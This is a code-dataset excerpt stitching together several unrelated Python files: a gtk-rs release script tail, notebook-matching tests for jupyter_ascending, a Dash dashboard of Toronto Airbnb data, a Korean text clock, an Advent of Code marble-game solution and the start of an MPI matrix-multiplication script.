Take a deep breath, check for opened '\n 'pull requests and once done, we can move forward!')\n write_msg(\"\\n{}\\n\".format('\\n'.join(PULL_REQUESTS)))\n PULL_REQUESTS.append('=============')\n input('Press ENTER to continue...')\n write_msg('=> Publishing crates...')\n for crate in args.crates:\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n publish_crate(crate[\"repository\"], crate[\"path\"], temp_dir, crate['crate'])\n write_msg('Done!')\n\n\ndef create_example_repository_pull_request(args):\n write_msg('=> Creating PR for examples repository')\n create_pull_request(\"examples\", \"pending\", \"master\", args.token)\n write_msg('Done!')\n\n\ndef generate_tags_and_version_branches(args, temp_dir, repositories):\n if args.no_push is True or args.doc_only is True or args.badges_only is True:\n return\n write_msg(\"=> Generating tags and branches...\")\n for repo in repositories:\n generate_new_tag(repo, temp_dir, args.specified_crate, args)\n generate_new_branches(repo, temp_dir, args.specified_crate, args)\n write_msg('Done!')\n\n\ndef regenerate_documentation(args, temp_dir, repositories):\n if args.badges_only is True or args.tags_only is True:\n return\n input(\"About to regenerate documentation. Are you sure you want to continue? \" +\n \"(Press ENTER to continue)\")\n update_doc_content_repository(repositories, temp_dir, args.token, args.no_push, args)\n write_msg('=> Preparing doc repo (too much dark magic in here urg)...')\n cleanup_doc_repo(temp_dir)\n write_msg('Done!')\n\n write_msg('=> Building docs...')\n for crate in args.crates:\n crate = crate['crate']\n if crate['crate'] == 'gtk-test':\n continue\n write_msg('-> Building docs for {}...'.format(crate['crate']))\n build_docs(crate['repository'], temp_dir, crate['path'],\n crate.get('doc_name', crate['crate']))\n end_docs_build(temp_dir)\n write_msg('Done!')\n\n write_msg('=> Committing{} docs to the \"{}\" branch...'\n .format(\" and pushing\" if args.no_push is False else \"\",\n consts.CRATE_TMP_BRANCH))\n commit(consts.DOC_REPO, temp_dir, \"Regen docs\")\n if args.no_push is False:\n push(consts.DOC_REPO, temp_dir, consts.CRATE_TMP_BRANCH)\n create_pull_request(\n consts.DOC_REPO,\n consts.CRATE_TMP_BRANCH,\n \"gh-pages\",\n args.token)\n write_msg(\"New pull request(s):\\n\\n{}\\n\".format('\\n'.join(PULL_REQUESTS)))\n write_msg('Done!')\n\n\ndef update_gtk_rs_blog(args, temp_dir):\n if args.doc_only is True or args.tags_only is True:\n return\n write_msg('=> Updating blog...')\n if update_badges(consts.BLOG_REPO, temp_dir, args.specified_crate) is False:\n write_error(\"Error when trying to update badges...\")\n elif args.no_push is False:\n commit_and_push(consts.BLOG_REPO, temp_dir, \"Update versions\",\n consts.MASTER_TMP_BRANCH)\n create_pull_request(\n consts.BLOG_REPO,\n consts.MASTER_TMP_BRANCH,\n \"master\",\n args.token)\n write_msg('Done!')\n\n\ndef checkout_crate_branches(temp_dir, repositories):\n write_msg('=> Checking out \"crate\" branches')\n for repo in repositories:\n checkout_target_branch(repo, temp_dir, \"crate\")\n write_msg('Done!')\n\n\ndef start(args, temp_dir):\n repositories = clone_repositories(args, temp_dir)\n if len(repositories) < 1:\n return\n if args.doc_only is False:\n if (args.blog_only is False and\n update_crates_versions(args, temp_dir, repositories) is False):\n return\n if args.badges_only is False and args.tags_only is False:\n build_blog_post(repositories, temp_dir, args.token)\n if args.blog_only:\n 
input(\"Blog post generated, press ENTER to quit (it'll remove the tmp folder and \"\n \"its content!)\")\n return\n\n checkout_crate_branches(temp_dir, repositories)\n\n if args.doc_only is False and args.badges_only is False and args.tags_only is False:\n if update_crate_repositories_branches(args, temp_dir, repositories) is False:\n return\n if args.no_push is False:\n publish_crates(args, temp_dir)\n create_example_repository_pull_request(args)\n\n generate_tags_and_version_branches(args, temp_dir, repositories)\n\n regenerate_documentation(args, temp_dir, repositories)\n\n update_gtk_rs_blog(args, temp_dir)\n\n write_msg('Seems like most things are done! Now remains:')\n write_msg(\" * Check generated docs for all crates (don't forget to enable features!).\")\n input('Press ENTER to leave (once done, the temporary directory \"{}\" will be destroyed)'\n .format(temp_dir))\n\n\ndef main(argv):\n args = Arguments.parse_arguments(argv)\n if args is None:\n sys.exit(1)\n if check_rustdoc_is_nightly() is False:\n return\n if check_if_up_to_date() is False:\n return\n write_msg('=> Creating temporary directory...')\n with temporary_directory() as temp_dir:\n write_msg('Temporary directory created in \"{}\"'.format(temp_dir))\n start(args, temp_dir)\n\n\n# Beginning of the script\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"src/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":30900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528206376","text":"import pytest\n\nfrom jupyter_ascending.errors import UnableToFindNotebookException\nfrom jupyter_ascending.handlers.jupyter_server import _clear_registered_servers\nfrom jupyter_ascending.handlers.jupyter_server import _make_url\nfrom jupyter_ascending.handlers.jupyter_server import get_server_for_notebook\nfrom jupyter_ascending.handlers.jupyter_server import register_server\n\n\nclass TestGetSever:\n def setup_method(self, _method):\n _clear_registered_servers()\n\n def test_clear_registered_servers(self):\n notebook_name = f\"hello.{SYNC_EXTENSION}.ipynb\"\n register_server(notebook_name, 1234)\n assert get_server_for_notebook(notebook_name) is not None\n\n _clear_registered_servers()\n with pytest.raises(UnableToFindNotebookException):\n get_server_for_notebook(notebook_name)\n\n def test_exact_match(self):\n notebook_name = f\"hello.{SYNC_EXTENSION}.ipynb\"\n notebook_port = 1234\n\n register_server(notebook_name, notebook_port)\n assert get_server_for_notebook(notebook_name) == _make_url(notebook_port)\n\n def test_stem_match(self):\n true_notebook_name = f\"/home/tj/git/notebook.{SYNC_EXTENSION}.ipynb\"\n remote_notebook_name = f\"/home/other/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n notebook_port = 1234\n\n register_server(true_notebook_name, notebook_port)\n assert get_server_for_notebook(true_notebook_name) == _make_url(notebook_port)\n assert get_server_for_notebook(remote_notebook_name) == _make_url(notebook_port)\n\n def test_more_than_stem_match(self):\n true_notebook_name = f\"/home/tj/git/notebook.{SYNC_EXTENSION}.ipynb\"\n do_not_pick_notebook = f\"/home/tj/do_not_pick/notebook.{SYNC_EXTENSION}.ipynb\"\n remote_notebook_name = f\"/home/other/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n notebook_port = 1234\n do_not_pick_port = 4444\n\n register_server(true_notebook_name, notebook_port)\n register_server(do_not_pick_notebook, do_not_pick_port)\n\n assert get_server_for_notebook(true_notebook_name) == _make_url(notebook_port)\n assert 
get_server_for_notebook(remote_notebook_name) == _make_url(notebook_port)\n\n def test_equally_matching_stem_errors(self):\n foo_notebook_name = f\"/home/foo/git/notebook.{SYNC_EXTENSION}.ipynb\"\n bar_notebook_name = f\"/home/bar/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n foo_port = 1234\n bar_port = 4321\n\n current_notebook_name = f\"/home/tj/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n register_server(foo_notebook_name, foo_port)\n register_server(bar_notebook_name, bar_port)\n\n assert get_server_for_notebook(foo_notebook_name) == _make_url(foo_port)\n assert get_server_for_notebook(bar_notebook_name) == _make_url(bar_port)\n\n # Can't determine which server this notebook belongs to\n with pytest.raises(UnableToFindNotebookException):\n get_server_for_notebook(current_notebook_name)\n\n def test_no_matches(self):\n loaded_notebook_name = f\"/home/tj/notebook.{SYNC_EXTENSION}.ipynb\"\n not_loaded_notebook_name = f\"/home/tj/other.{SYNC_EXTENSION}.ipynb\"\n\n register_server(loaded_notebook_name, 1234)\n\n with pytest.raises(UnableToFindNotebookException):\n get_server_for_notebook(not_loaded_notebook_name)\n","sub_path":"jupyter_ascending/tests/test_notebook_matching.py","file_name":"test_notebook_matching.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"577607428","text":"import numpy as np\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\nimport pandas as pd\r\nimport glob\r\nimport fnmatch\r\nimport json\r\nfrom plotly.subplots import make_subplots\r\n\r\n#external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n\r\n#app = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\napp = dash.Dash(__name__, meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width\"}])\r\n\r\nserver = app.server\r\n\r\nall_files = glob.glob('data_cleaned/*')\r\nall_files.sort()\r\nprint(all_files)\r\n\r\n\r\n# Store dataframes in a dictionary\r\ndfs_dict = {}\r\n\r\nfor filename in all_files:\r\n df = pd.read_csv(filename, compression='gzip')\r\n dfs_dict[filename[13:-7]] = df\r\n\r\nprint(dfs_dict.keys())\r\n\r\nwith open('neighbourhoods.geojson') as fp:\r\n TRT_geo = json.load(fp)\r\n\r\nlayout = dict(\r\n autosize=True,\r\n automargin=True,\r\n margin=dict(l=30, r=30, b=20, t=40),\r\n hovermode=\"closest\",\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10), orientation=\"h\")\r\n)\r\n\r\ndef_click = {'points': [{'curveNumber': 0, 'pointNumber': 122, 'pointIndex': 122,\r\n 'location': 'Waterfront Communities-The Island', 'z': 1183.66}]}\r\ndef_hov = {'points': [{'curveNumber': 0, 'pointNumber': 23, 'pointIndex': 23,\r\n 'x': '2020 Oct', 'y': 1183.66}]}\r\n\r\ngithub_link = \"App source code: [Github](https://github.com/RobinKongNingLo/dash-toronto-airbnb)\"\r\n\r\ndata_source = \"Dataset source: [Inside Airbnb](http://insideairbnb.com/get-the-data.html)\"\r\n\r\napp.layout = html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.A(\r\n html.Img(className=\"logo\", src=app.get_asset_url(\"dash-logo.png\")),\r\n href=\"https://dash.plot.ly/\",\r\n ),\r\n html.H2(\r\n [\r\n \"Toronto Airbnb Data App\",\r\n ],\r\n style={\"text-align\": \"left\"},\r\n ),\r\n\r\n html.P('Select a feature'),\r\n dcc.Dropdown(\r\n id='feature_dropdown',\r\n options=[\r\n {'label': 'Price per 
Accommodate per Day', 'value': 'price'},\r\n {'label': 'Revenue per Accommodate per Month', 'value': 'revenue'},\r\n {'label': 'Occupancy per Month', 'value': 'occupancy'}\r\n ],\r\n value='revenue'),\r\n html.H3('About this app'),\r\n html.P('Click a neighbourhood from the map to see the data visualization of the neighbourhood, '\r\n 'click a time from the line chart to see the data visualization at the time. '),\r\n html.Div(id=\"github_link\", children=dcc.Markdown(github_link)),\r\n html.Div(id=\"data_set_source\", children=dcc.Markdown(data_source)),\r\n ],\r\n className='pretty_container threehalf columns'\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.P(\"Selected Neighbourhood\"),\r\n html.H6(id=\"neighbourhood_txt\"),\r\n ],\r\n className='eight columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.P(id=\"avg_1_txt\"),\r\n html.H6(id=\"avg_1_val\"),\r\n ],\r\n className='five columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.P(id=\"avg_2_txt\"),\r\n html.H6(id=\"avg_2_val\"),\r\n ],\r\n className='five columns pretty_container'\r\n ),\r\n ],\r\n className='row container-display',\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4(id='map_title'),\r\n dcc.Graph(id='map', figure={}, clickData=def_click, config={'displayModeBar': False})\r\n ],\r\n id='mapContainer',\r\n className='seven columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.H4(id='box_title'),\r\n dcc.Graph(id='box', figure={}, config={'displayModeBar': False})\r\n ],\r\n id='boxContainer',\r\n className='five columns pretty_container'\r\n ),\r\n ],\r\n className='row container-display',\r\n ),\r\n ],\r\n className='eighthalf columns'\r\n ),\r\n ],\r\n className=\"row flex-display\"\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4(id='pie_title'),\r\n dcc.Graph(id='pie', figure={}, config={'displayModeBar': False})\r\n ],\r\n id='pieContainer',\r\n className='pretty_container threehalf columns'\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4(id='line_title'),\r\n dcc.Graph(id='line', figure={}, clickData=def_hov, config={'displayModeBar': False})\r\n ],\r\n id='lineContainer',\r\n className='seven columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.H4(id='bar_title'),\r\n dcc.Graph(id='bar', figure={}, config={'displayModeBar': False})\r\n ],\r\n id='barContainer',\r\n className='five columns pretty_container'\r\n ),\r\n ],\r\n className='row container-display eighthalf columns',\r\n ),\r\n ],\r\n className=\"row flex-display\"\r\n )\r\n ],\r\n style={\"display\": \"flex\", \"flex-direction\": \"column\"},\r\n)\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='box_title', component_property='children'),\r\n Output(component_id='line_title', component_property='children'),\r\n Output(component_id='bar_title', component_property='children'),\r\n Output(component_id='pie_title', component_property='children')],\r\n [Input(component_id='feature_dropdown', component_property='value'),\r\n Input(component_id='line', component_property='clickData')]\r\n)\r\ndef update_titles(feature, hover_data):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n box_title = \"Box Plot of \" + feature.capitalize() #+ \" \" + key_1[9:13] + \" vs \" + key_2[9:]\r\n line_title = \"Line Chart of \" + feature.capitalize() + \" Nov 2018 to Oct 2020\"\r\n bar_title = \"Bar Chart of \" + feature.capitalize() #+ \" \" + key_1[9:13] + \" vs \" + key_2[9:]\r\n pie_title = \"Number of 
Each Room Type \" #+ key_1[9:13] + \" vs \" + key_2[9:]\r\n return box_title, line_title, bar_title, pie_title\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='map', component_property='figure'),\r\n Output(component_id='map_title', component_property='children')],\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_map(hover_data, feature):\r\n print(hover_data)\r\n df_feature = dfs_dict[feature]\r\n dff = df_feature[['neighbourhood_cleansed', 'room_type', hover_data['points'][0]['x']]]\r\n dff = dff.loc[dff['room_type'] == 'Both']\r\n\r\n\r\n\r\n fig_map = px.choropleth_mapbox(dff, geojson=TRT_geo,\r\n locations=\"neighbourhood_cleansed\",\r\n featureidkey=\"properties.neighbourhood\",\r\n color=dff[hover_data['points'][0]['x']],\r\n #color_continuous_scale=[(0.00, \"#ff000d\"), (0.50, \"#007a89\"), (1.00, \"#27408B\")],\r\n color_continuous_scale=\"DarkMint\",\r\n mapbox_style=\"carto-positron\",\r\n zoom=9,\r\n center={\"lat\": 43.722275, \"lon\": -79.406074},\r\n opacity=0.5,\r\n )\r\n\r\n \"\"\"\r\n fig_map = go.Figure(go.Choroplethmapbox(geojson=TRT_geo,\r\n locations=dff.neighbourhood_cleansed,\r\n featureidkey=\"properties.neighbourhood\",\r\n z=dff[hover_data['points'][0]['x']],\r\n marker_opacity=0.5,\r\n colorscale=\"Viridis\",\r\n colorbar=dict(thickness=10, ticklen=0),\r\n marker_line_width=0\r\n ))\r\n \r\n fig_map.update_layout(\r\n mapbox_style=\"carto-positron\",\r\n mapbox_zoom=9,\r\n #marker_opacity=0.5,\r\n mapbox_center={\"lat\": 43.722275, \"lon\": -79.366074},\r\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1\r\n ),\r\n )\r\n \"\"\"\r\n fig_map.update_coloraxes(\r\n colorbar_xpad=10,\r\n colorbar_ypad=10,\r\n colorbar_x=0,\r\n colorbar_thickness=20,\r\n colorbar_title=None\r\n #showscale=False\r\n )\r\n fig_map.update_traces(hovertemplate=None)\r\n fig_map.update_layout(\r\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n hoverlabel=dict(\r\n font_size=12,\r\n namelength=-1,\r\n bgcolor=\"#007a89\")\r\n )\r\n map_title = \"Map Overview of \" + feature.capitalize() + \" \" + hover_data['points'][0]['x']\r\n return fig_map, map_title\r\n\r\n\r\n@app.callback(\r\n Output(component_id='line', component_property='figure'),\r\n [Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_line(click_data, feature):\r\n print(click_data)\r\n df_feature = dfs_dict[feature]\r\n dff_pr_feature = df_feature.loc[\r\n (df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Private room')]\r\n dff_eh_feature = df_feature.loc[\r\n (df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Entire home/apt')]\r\n dff_pr_feature = dff_pr_feature.transpose()[2:].reset_index()\r\n dff_pr_feature.columns = ['time', feature]\r\n dff_eh_feature = dff_eh_feature.transpose()[2:].reset_index()\r\n dff_eh_feature.columns = ['time', feature]\r\n fig = go.Figure(go.Scatter(x=dff_pr_feature['time'], y=dff_pr_feature[feature],\r\n mode='lines+markers', name='Private Room', marker_color=\"#ff5a61\"))\r\n fig.add_trace(go.Scatter(x=dff_eh_feature['time'], 
y=dff_eh_feature[feature],\r\n mode='lines+markers', name='Entire Home/Apt', marker_color=\"#007a89\"))\r\n #fig.update_traces(mode=\"markers+lines\", hovertemplate=None)\r\n\r\n fig.update_layout(\r\n margin={\"r\": 0, \"t\": 0.5, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1\r\n ),\r\n hovermode=\"x\",\r\n hoverlabel=dict(\r\n font_size=12,\r\n namelength=-1\r\n )\r\n )\r\n return fig\r\n\r\n\r\n@app.callback(\r\n Output(component_id='neighbourhood_txt', component_property='children'),\r\n [Input(component_id='map', component_property='clickData')]\r\n)\r\ndef update_neighbourhood_txt(click_data):\r\n return click_data['points'][0]['location']\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='avg_1_txt', component_property='children'),\r\n Output(component_id='avg_2_txt', component_property='children'),\r\n Output(component_id='avg_1_val', component_property='children'),\r\n Output(component_id='avg_2_val', component_property='children')\r\n ],\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_avg_box(hover_data, click_data, feature):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*'+hover_data['points'][0]['x'][5:])]\r\n txt_1 = key_1[9:] + \" Average\"\r\n txt_2 = key_2[9:] + \" Average\"\r\n df_feature = dfs_dict[feature]\r\n val_1 = df_feature.loc[(df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Both')][key_1[9:]]\r\n val_2 = df_feature.loc[(df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Both')][key_2[9:]]\r\n val_1 = format(float(val_1), '0,.2f')\r\n val_2 = format(float(val_2), '0,.2f')\r\n if feature == 'occupancy':\r\n val_1 = val_1 + ' Days'\r\n val_2 = val_2 + ' Days'\r\n else:\r\n val_1 = '$' + val_1\r\n val_2 = '$' + val_2\r\n return txt_1, txt_2, val_1, val_2\r\n\r\n\r\n@app.callback(\r\n Output(component_id='box', component_property='figure'),\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_box(hover_data, click_data, feature):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n df_time_1 = dfs_dict[key_1]\r\n df_time_2 = dfs_dict[key_2]\r\n # Column of price in listings tables are called 'price_per_accommodate'\r\n if feature == 'price':\r\n feature = 'price_per_accommodate'\r\n df_time_1 = df_time_1.loc[df_time_1['neighbourhood_cleansed'] == click_data['points'][0]['location']]\r\n df_time_2 = df_time_2.loc[df_time_2['neighbourhood_cleansed'] == click_data['points'][0]['location']]\r\n fig = go.Figure(data=[go.Box(x=df_time_1[\"room_type\"], y=df_time_1[feature], name=key_1[9:], marker_color=\"#ff5a61\"),\r\n go.Box(x=df_time_2[\"room_type\"], y=df_time_2[feature], name=key_2[9:], marker_color=\"#007a89\")])\r\n fig.update_layout(\r\n boxmode='group', # group together boxes of the different traces for each value of x\r\n margin={\"r\": 0, \"t\": 0.5, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n 
legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1,\r\n ),\r\n #yaxis=dict(title='Revenue per Accommodate', title_font_family=\"Helvetica\", zeroline=False),\r\n )\r\n fig.update_traces(hovertemplate=\"%{x}<br>
\" + feature.capitalize() + \": %{y}\")\r\n return fig\r\n\r\n\r\n@app.callback(\r\n Output(component_id='pie', component_property='figure'),\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData')]\r\n)\r\ndef update_pie(hover_data, click_data):\r\n df_count = dfs_dict['count']\r\n df_count = df_count.loc[(df_count['neighbourhood_cleansed'] == click_data['points'][0]['location'])\r\n & (df_count['room_type'] != 'Both')]\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n fig = make_subplots(rows=1, cols=2, specs=[[{'type':'domain'}, {'type':'domain'}]], subplot_titles=[key_1[9:], key_2[9:]])\r\n fig.add_trace(go.Pie(labels=df_count['room_type'], values=df_count[key_1[9:]], name=key_1[9:],\r\n textinfo='value', insidetextorientation='radial'), 1, 1)\r\n fig.add_trace(go.Pie(labels=df_count['room_type'], values=df_count[key_2[9:]], name=key_2[9:],\r\n textinfo='value', insidetextorientation='radial'), 1, 2)\r\n fig.update_traces(hole=.3, marker=dict(colors=['#007a89', '#ff5a61']), hovertemplate=\"%{label}:
Number: %{value}<br>
Percentage: %{percent}\")\r\n fig.update_layout( # group together boxes of the different traces for each value of x\r\n margin={\"r\": 15.5, \"t\": 0, \"l\": 15.5, \"b\": 15.5},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1,\r\n ),\r\n annotations=[{'font': {'size': 12},\r\n 'y': -0.1},\r\n {'font': {'size': 12},\r\n 'y': -0.1}\r\n ]\r\n #annotations=[dict(text=key_1[9:], x=0.14, y=-0.1, font_size=12, showarrow=False),\r\n #dict(text=key_2[9:], x=0.87, y=-0.1, font_size=12, showarrow=False)]\r\n )\r\n return fig\r\n\r\n\r\n@app.callback(\r\n Output(component_id='bar', component_property='figure'),\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_bar(hover_data, click_data, feature):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n df_feature = dfs_dict[feature]\r\n df_feature = df_feature.loc[(df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location'])\r\n & (df_feature['room_type'] != 'Both')]\r\n fig = go.Figure(data=[go.Bar(name=key_1[9:], x=df_feature['room_type'], y=df_feature[key_1[9:]], marker_color=\"#ff5a61\"),\r\n go.Bar(name=key_2[9:], x=df_feature['room_type'], y=df_feature[key_2[9:]], marker_color=\"#007a89\")])\r\n fig.update_traces(hovertemplate=\"%{x}<br>
\" + feature.capitalize() + \": %{y}\")\r\n fig.update_layout(\r\n boxmode='group', # group together boxes of the different traces for each value of x\r\n margin={\"r\": 0, \"t\": 0.5, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1,\r\n ),\r\n # yaxis=dict(title='Revenue per Accommodate', title_font_family=\"Helvetica\", zeroline=False),\r\n )\r\n return fig\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","sub_path":"dashapp.py","file_name":"dashapp.py","file_ext":"py","file_size_in_byte":20816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62441785","text":"class ck :#ChangeToKorean\n original_num = [\"한\", \"두\", \"세\", \"네\", \"다섯\", \"여섯\", \"일곱\", \"여덟\", \"아홉\", \"열\"]\n chinese_num = [\"\", \"일\",\"이\", \"삼\", \"사\", \"오\", \"육\", \"칠\", \"팔\", \"구\", \"십\"]\n def hour(self, hour) :\n self.hour = hour\n if self.hour < 11 :\n print(ck.original_num[self.hour-1], end='')\n else :\n print(self.hour)\n print(ck.original_num[9] + ck.original_num[self.hour-11], end='')\n print(\" 시\")\n def minute(self, minute) :\n self.minute = minute\n if self.minute <= 10 :\n print(ck.chinese_num[minute - 1], end='')#10이하의 수는 그냥 minute을 출력\n\n elif self.minute > 10 :\n self.minute_one = self.minute#1의 자리 수를 위해 minute_one을 정의\n while self.minute_one > 11 :\n self.minute_one -= 10#minute_one에 minute의 1의 자리 숫자 정의\n self.minute = int(self.minute / 10)#minute에 십자리 수를 일의 자리 수로 바꿔준다. / int를 사용한 이유 : float형으로 저장되버리기 때문\n print(ck.chinese_num[self.minute] + ck.chinese_num[10], end='')\n if self.minute_one != 0 :\n print(\" \"+ck.chinese_num[self.minute_one], end='')\n print(\"분\")\n\nimport time\nck = ck()\nhour = time.localtime()[3]\n\nif hour <= 12 :\n apm = \"오전\"\nelse :\n apm = \"오후\"\n hour -= 12\n\nprint(apm+\" \", end=\"\")\nck.hour(hour)\nck.minute(time.gmtime()[4])\n","sub_path":"hangul-clock.py","file_name":"hangul-clock.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183125310","text":"# TODO: rewrite to C++?\nclass LinkedList:\n class Node:\n def __init__(self, value, prev=None, next=None):\n self.value = value\n self.prev = prev if prev else self\n self.next = next if next else self\n\n def __repr__(self):\n return \"{0}\".format(self.value)\n\n def __init__(self):\n self.number_of_nodes = 0\n self.current = None\n\n def __repr__(self):\n output = \"\"\n current = self.current.prev\n while current is not self.current:\n output += \"{0} \".format(current)\n current = current.prev\n output += \"({0})\".format(self.current)\n current = self.current.next\n while current is not self.current:\n output += \" {0}\".format(current)\n current = current.next\n return output\n\n def get_current(self):\n return self.current\n\n def set_current(self, node):\n self.current = node\n\n def insert(self, value):\n \"\"\"\n Insert a new node before current node.\n \"\"\"\n if not self.current:\n self.current = self.Node(value)\n else:\n prev = self.current.prev\n next = self.current\n self.current = self.Node(value, prev, next)\n prev.next = self.current\n next.prev = self.current\n self.number_of_nodes += 1\n return self.get_current()\n\n def iterate(self, idx):\n while idx < 0:\n self.current = self.current.prev\n idx += 1\n while idx > 0:\n self.current = self.current.next\n 
idx -= 1\n return self.get_current()\n\n def remove(self):\n \"\"\"\n Remove current node. Next node will be current's node previous.\n \"\"\"\n\n if self.number_of_nodes == 1:\n del self.current\n self.current = None\n else:\n current = self.current\n self.current.prev.next = self.current.next\n self.current.next.prev = self.current.prev\n self.current = self.current.prev\n del current\n self.number_of_nodes -= 1\n\ndef solve(num_of_players, last_marble):\n scores = num_of_players * [0]\n marbles = LinkedList()\n marbles.insert(0)\n marble = 1\n while marble <= last_marble:\n for player in range(num_of_players):\n if marble % 23 == 0:\n marbles.iterate(-7)\n scores[player] += marbles.get_current().value + marble\n marbles.remove()\n marbles.iterate(1)\n else:\n marbles.iterate(2)\n marbles.insert(marble)\n marble += 1\n return max(scores)\n\ndef first_star(input):\n num_of_players = int(input[0].split()[0])\n last_marble = int(input[0].split()[6])\n return solve(num_of_players, last_marble)\n\ndef second_star(input):\n num_of_players = int(input[0].split()[0])\n last_marble = int(input[0].split()[6])\n return solve(num_of_players, last_marble * 100)","sub_path":"day09/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"30057332","text":"\"\"\"\nName: Heecheon Park\nDate: September 6th 2019\nMinnesota State University Moorhead\n\nRunning 1000x1000 matrix multiplication with list and mpi\nwith 5 processors.\n\n\nExecution Method:\n\nmpiexec -np 5 python3 mpi_list_matmult.py\n\"\"\"\nfrom mpi4py import MPI\nfrom numba import njit, jit\nimport numpy as np\nimport sys\nimport time\n\nMASTER = 0\n\ndef main():\n \n COMM = MPI.COMM_WORLD\n RANK = COMM.Get_rank()\n SIZE = COMM.Get_size()\n\n #print(SIZE)\n\n col_split = 1000 // (SIZE - 1)\n chunkSize = int(col_split) * 1000\n offset = 1000000 / (SIZE - 1)\n local_row = 1000 / (SIZE - 1)\n\n list_mat = []\n list_mat2 = []\n local_mat = []\n local_mat2 = []\n 